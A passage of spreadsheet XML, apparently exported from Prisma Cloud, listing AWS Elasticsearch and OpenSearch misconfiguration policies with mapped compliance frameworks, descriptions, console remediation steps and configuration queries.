27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), ITSG-33, TX-RAMP Level 2, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v12, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, Matt's ATT&amp;ACK, TX-RAMP Level 1, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, jneytchev-fedramp-low, ITSG-33, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), CIS Controls v8, CyberSecurity Law of the People's Republic of China, MITRE ATT&amp;CK v6.3 [Deprecated], PCI DSS v4.0, SOC 2, kfirdaus AWS Account-CS, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, SOC 2, ISO/IEC 27001:2022, PCI DSS v4.0, MLPS 2.0 (Level 3), Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], PIPEDA, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, Fedramp (Low), kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], MAS TRM 2021, CCPA 2018, ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), TX-RAMP Level 2, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, HIPAA, HIPAA, PCI DSS v4.0, Fedramp (Moderate), HITRUST CSF v.9.6.0, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B1925" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1925" s="2" t="inlineStr"/>
      <c r="D1925" t="inlineStr"/>
      <c r="E1925" t="inlineStr"/>
      <c r="F1925" t="inlineStr"/>
      <c r="G1925" t="b">
        <v>1</v>
      </c>
      <c r="H19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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1925" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1925" t="inlineStr">
        <is>
          <t>AWS Elasticsearch domain publicly accessible</t>
        </is>
      </c>
      <c r="L1925" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1925" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1925" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1925" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1925" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1925" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1925" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S1925" t="inlineStr"/>
      <c r="T1925" t="b">
        <v>0</v>
      </c>
      <c r="U1925" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1925" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1925" t="inlineStr">
        <is>
          <t>This policy identifies Elasticsearch domains which are publicly accessible. Enabling VPCs for Elasticsearch domains provides flexibility and control over the clusters access with an extra layer of security than Elasticsearch domains that use public endpoints. It also keeps all traffic between your VPC and Elasticsearch domains within the AWS network instead of going over the public Internet.</t>
        </is>
      </c>
      <c r="X1925" t="inlineStr">
        <is>
          <t>VPC for AWS Elasticsearch domain can be set only at the time of the creation of domain. So to resolve this alert, create a new domain with VPC, then migrate all required Elasticsearch domain data from the reported Elasticsearch domain to this newly created domain and delete reported Elasticsearch domain.
To set up the new ES domain with VPC, refer the following URL:
https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html
To create Elasticsearch domain within VPC, In Network configuration choose VPC access instead of Public access.
To delete reported ES domain, refer the following URL:
https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-gsg-deleting.html</t>
        </is>
      </c>
      <c r="Y1925" t="inlineStr"/>
      <c r="Z1925" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = processing is false and vpcoptions.vpcid does not exist</t>
        </is>
      </c>
      <c r="AA1925" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1925" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1925" t="inlineStr">
        <is>
          <t>PC-AWS-ES-215</t>
        </is>
      </c>
      <c r="AD1925" t="b">
        <v>1</v>
      </c>
      <c r="AE1925" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1925" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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5" t="inlineStr">
        <is>
          <t>4b411b41-7f4d-4626-884e-5ba8abd2a739</t>
        </is>
      </c>
      <c r="AI1925" t="inlineStr">
        <is>
          <t>57c3fd57-0e6a-4be5-ad77-a9c278a9ba3e</t>
        </is>
      </c>
      <c r="AJ1925" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1925" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1926">
      <c r="A1926" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.6, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), CSA CCM v3.0.1, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, CSA CCM v3.0.1, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), CSA CCM v3.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), CSA CCM v3.0.1, ISO/IEC 27002:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, CSA CCM v3.0.1, ACSC Information Security Manual (ISM), ISO 27002:2022, APRA (CPS 234) Information Security, CSA CCM v3.0.1, ISO/IEC 27017:2015, CSA CCM v3.0.1, PCI DSS v3.2.1, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, CIS Controls v8.1, kfirdaus AWS Account-CS, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev 5, MAS TRM 2021, PCI DSS v4.0, ISO/IEC 27001:2022, HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, CRI Profile v1.2.1, HITRUST CSF v9.3 [Deprecated], NIST SP 800-172, CSA CCM v3.0.1, TX-RAMP Level 2, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], HITRUST CSF v.11.2.0, CyberSecurity Law of the People's Republic of China, CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, NIST 800-171 Rev1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v.4.0.1, SOC 2, Risk Management in Technology (RMiT), MLPS 2.0, CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, CRI Profile v2.0, NIST 800-53 Rev4, CRI Profile v2.0, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, SOC 2, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, CSA CCM v3.0.1, MLPS 2.0 (Level 3), NIST CSF, GDPR, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, SOC 2, Fedramp (Moderate), FFIEC, PCI DSS v4.0, CRI Profile v2.0, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, CIS Controls v8.1, CSA CCM v3.0.1, CSA CCM v4.0.12, DORA, DORA, NIST 800-171 Rev1, Copy of ACSC Information Security Manual (ISM)-clone, Copy of CIS Controls v8, CSA CCM v3.0.1, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, NIST CSF v2.0</t>
        </is>
      </c>
      <c r="B1926" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1926" s="2" t="inlineStr"/>
      <c r="D1926" t="inlineStr"/>
      <c r="E1926" t="inlineStr"/>
      <c r="F1926" t="inlineStr"/>
      <c r="G1926" t="b">
        <v>0</v>
      </c>
      <c r="H19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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1926" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1926" t="inlineStr">
        <is>
          <t>AWS Elasticsearch domain has Index slow logs set to disabled</t>
        </is>
      </c>
      <c r="L1926" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1926" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1926" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1926" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1926" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1926" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1926" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1926" t="inlineStr"/>
      <c r="T1926" t="b">
        <v>0</v>
      </c>
      <c r="U1926" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1926" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1926" t="inlineStr">
        <is>
          <t>This policy identifies Elasticsearch domains for which Index slow logs is disabled in your AWS account. Enabling support for publishing indexing slow logs to AWS CloudWatch Logs enables you have full insight into the performance of indexing operations performed on your Elasticsearch clusters. This will help you in identifying performance issues caused by specific queries or due to changes in cluster usage, so that you can optimize your index configuration to address the problem.</t>
        </is>
      </c>
      <c r="X1926" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Elasticsearch Service Dashboard
4. Choose reported Elasticsearch domain
5. Select the 'Logs' tab
6. In 'Set up Index slow logs' section,
 a. click on 'Setup'
 b. In 'Select CloudWatch Logs log group' setting, Create/Use existing CloudWatch Logs log group as per your requirement
 c. In 'Specify CloudWatch access policy', Create new/Select an existing policy as per your requirement
 d. Click on 'Enable'
The Index slow logs setting 'Status' should change now to 'Enabled'.</t>
        </is>
      </c>
      <c r="Y1926" t="inlineStr"/>
      <c r="Z1926" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = 'processing is false and (logPublishingOptions does not exist or logPublishingOptions.INDEX_SLOW_LOGS.enabled is false or logPublishingOptions.INDEX_SLOW_LOGS.cloudWatchLogsLogGroupArn is empty)'</t>
        </is>
      </c>
      <c r="AA1926" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1926" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1926" t="inlineStr">
        <is>
          <t>PC-AWS-ES-179</t>
        </is>
      </c>
      <c r="AD1926" t="b">
        <v>1</v>
      </c>
      <c r="AE1926" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1926" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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6" t="inlineStr">
        <is>
          <t>050f3fd0-f587-49cb-9717-889d4e6590a5</t>
        </is>
      </c>
      <c r="AI1926" t="inlineStr">
        <is>
          <t>cedcf5ed-bf53-4da1-8791-0bdb9c85fd4a</t>
        </is>
      </c>
      <c r="AJ1926" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1926" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1927">
      <c r="A1927" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, SOC 2, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B1927" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1927" s="2" t="inlineStr"/>
      <c r="D1927" t="inlineStr"/>
      <c r="E1927" t="inlineStr"/>
      <c r="F1927" t="inlineStr"/>
      <c r="G1927" t="b">
        <v>1</v>
      </c>
      <c r="H19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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1927" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1927" t="inlineStr">
        <is>
          <t>AWS OpenSearch attached security group overly permissive to all traffic</t>
        </is>
      </c>
      <c r="L1927" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1927" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1927" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1927" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1927" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1927" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R1927" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S1927" t="inlineStr"/>
      <c r="T1927" t="b">
        <v>0</v>
      </c>
      <c r="U1927" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1927" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1927" t="inlineStr">
        <is>
          <t>This policy identifies AWS OpenSearch attached Security group that are overly permissive to all traffic. Security group enforces IP-based access policies to OpenSearch. As a best practice, restrict traffic solely from known static IP addresses or CIDR range.</t>
        </is>
      </c>
      <c r="X1927" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact on your applications/services. If the Security Group reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the AWS console
2. Navigate to the 'VPC' service
3. Select the 'Security Group' reported in the alert
4. Click on 'Inbound Rules'
5. Remove the rule which has the 'Source' value as 0.0.0.0/0 or ::/0</t>
        </is>
      </c>
      <c r="Y1927" t="inlineStr"/>
      <c r="Z1927" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = vpcoptions.securityGroupIds[*] exists as X; config from cloud.resource where api.name = 'aws-ec2-describe-security-groups' AND json.rule = isShared is false and (ipPermissions[*].ipv4Ranges[*].cidrIp equals 0.0.0.0/0 or ipPermissions[*].ipv6Ranges[*].cidrIpv6 equals ::/0) as Y; filter '$.X.vpcoptions.securityGroupIds[*] contains $.Y.groupId'; show Y;</t>
        </is>
      </c>
      <c r="AA1927" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1927" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1927" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-798</t>
        </is>
      </c>
      <c r="AD1927" t="b">
        <v>1</v>
      </c>
      <c r="AE1927" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1927" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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7" t="inlineStr">
        <is>
          <t>cb5edef0-8968-48b4-8bc9-6ffa6ed2d816</t>
        </is>
      </c>
      <c r="AI1927" t="inlineStr">
        <is>
          <t>c3c3bcd8-b41f-4349-a748-4322c5e8caf8</t>
        </is>
      </c>
      <c r="AJ1927" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1927" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1928">
      <c r="A1928" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, ISO 27002:2022, RBI Baseline Cyber Security and Resilience Requirements, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-172, ISO/IEC 27017:2015, NIST CSF v2.0, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CIS Controls v8.1, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST CSF, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CHC HITRUST CSF v.9.6.0, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Copy of CIS Controls v8, CRI Profile v1.2.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27001:2022, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, FFIEC, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1928" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1928" s="2" t="inlineStr"/>
      <c r="D1928" t="inlineStr"/>
      <c r="E1928" t="inlineStr"/>
      <c r="F1928" t="inlineStr"/>
      <c r="G1928" t="b">
        <v>1</v>
      </c>
      <c r="H19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28" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1928" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1928" t="inlineStr">
        <is>
          <t>AWS Elasticsearch domain has Dedicated master set to disabled</t>
        </is>
      </c>
      <c r="L1928" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1928" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1928" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1928" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1928" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1928" t="inlineStr">
        <is>
          <t>CIS Control 3</t>
        </is>
      </c>
      <c r="R1928" t="inlineStr">
        <is>
          <t>3.3</t>
        </is>
      </c>
      <c r="S1928" t="inlineStr"/>
      <c r="T1928" t="b">
        <v>0</v>
      </c>
      <c r="U1928" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1928" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1928" t="inlineStr">
        <is>
          <t>This policy identifies Elasticsearch domains for which Dedicated master is disabled in your AWS account. If dedicated master nodes are provided those handle the management tasks and cluster nodes can easily manage index and search requests from different types of workload and make them more resilient in production. Dedicated master nodes improve environmental stability by freeing all the management tasks from the cluster data nodes.</t>
        </is>
      </c>
      <c r="X1928" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Elasticsearch Service Dashboard
4. Choose reported Elasticsearch domain
5. Click on 'Edit Domain'
6. On the 'Edit domain' page,
 a. Check 'Enable dedicated master' checkbox to enable dedicated master nodes for the current cluster.
 b. Select the 'Instance type' based on your ES cluster requirements from the dropdown list.
 Note: As dedicated master nodes do not hold any data nor process any search and query requests, the instance node for this role typically does not require a large amount of CPU/RAM memory.
 c. Select the 'Number of master nodes' from dropdown list to allocate dedicated master nodes.
7. Click on 'Submit' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-59
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-2-59</t>
        </is>
      </c>
      <c r="Y1928" t="inlineStr"/>
      <c r="Z1928" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = 'processing is false and (elasticsearchClusterConfig.dedicatedMasterEnabled is false or elasticsearchClusterConfig.dedicatedMasterEnabled does not exist)'
{"category":"General","resourceTypes":["aws_opensearch_domain","aws_elasticsearch_domain"]}</t>
        </is>
      </c>
      <c r="AA1928" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1928" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1928" t="inlineStr">
        <is>
          <t>PC-AWS-ES-177-CKV2_AWS_59</t>
        </is>
      </c>
      <c r="AD1928" t="b">
        <v>1</v>
      </c>
      <c r="AE1928" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1928" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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28" t="inlineStr">
        <is>
          <t>5727a110-89e3-4f9f-befa-6ed9d2f474a1</t>
        </is>
      </c>
      <c r="AI1928" t="inlineStr">
        <is>
          <t>ea657be6-6810-4964-9a15-81a8f0177784</t>
        </is>
      </c>
      <c r="AJ1928" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1928" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1929">
      <c r="A1929" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, ITSG-33, NYDFS 23 CRR-NY 500.0, GDPR, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, NIST 800-53 Rev 5, TX-RAMP Level 2, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B1929" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1929" s="2" t="inlineStr"/>
      <c r="D1929" t="inlineStr"/>
      <c r="E1929" t="inlineStr"/>
      <c r="F1929" t="inlineStr"/>
      <c r="G1929" t="b">
        <v>1</v>
      </c>
      <c r="H19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929" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1929" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1929" t="inlineStr">
        <is>
          <t>AWS Opensearch domain audit logging disabled</t>
        </is>
      </c>
      <c r="L1929" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1929" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1929" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1929" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1929" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1929" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R1929" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S1929" t="inlineStr"/>
      <c r="T1929" t="b">
        <v>0</v>
      </c>
      <c r="U1929" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1929" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1929" t="inlineStr">
        <is>
          <t>This policy identifies AWS Opensearch domains with audit logging disabled.
Opensearch audit logs enable you to monitor user activity on your Elasticsearch clusters, such as authentication successes and failures, OpenSearch requests, index updates, and incoming search queries.
It is recommended to enable audit logging for an Elasticsearch domain to audit activity in the domain.</t>
        </is>
      </c>
      <c r="X1929" t="inlineStr">
        <is>
          <t>To enable the AWS Opensearch domain with audit logs:
1. Sign into the AWS console and navigate to the Opensearch Service Dashboard
2. In the navigation pane, under 'Managed Clusters', select 'Domains'
2. Choose the reported Elasticsearch domain
3. On the Logs tab, select 'Audit logs' and choose 'Enable'.
4. In the 'Set up audit logs' section, in the 'Select log group from CloudWatch logs' setting, Create/Use existing CloudWatch Logs log group as per your requirement
5. In 'Specify CloudWatch access policy', create new/Select an existing policy as per your requirement
6. Click on 'Enable'</t>
        </is>
      </c>
      <c r="Y1929" t="inlineStr"/>
      <c r="Z1929" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = domainProcessingStatus equal ignore case active and (logPublishingOptions does not exist or logPublishingOptions.AUDIT_LOGS.enabled is false)</t>
        </is>
      </c>
      <c r="AA1929" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1929" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1929" t="inlineStr">
        <is>
          <t>PC-AWS-ES-1202</t>
        </is>
      </c>
      <c r="AD1929" t="b">
        <v>1</v>
      </c>
      <c r="AE1929" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1929" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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29" t="inlineStr">
        <is>
          <t>b6016294-3bb4-46f0-b3e9-93f040b8f0b6</t>
        </is>
      </c>
      <c r="AI1929" t="inlineStr">
        <is>
          <t>eeb31ffd-1d61-405f-bbbe-7f6ef15c6fd5</t>
        </is>
      </c>
      <c r="AJ1929" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1929" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1930">
      <c r="A1930" t="inlineStr">
        <is>
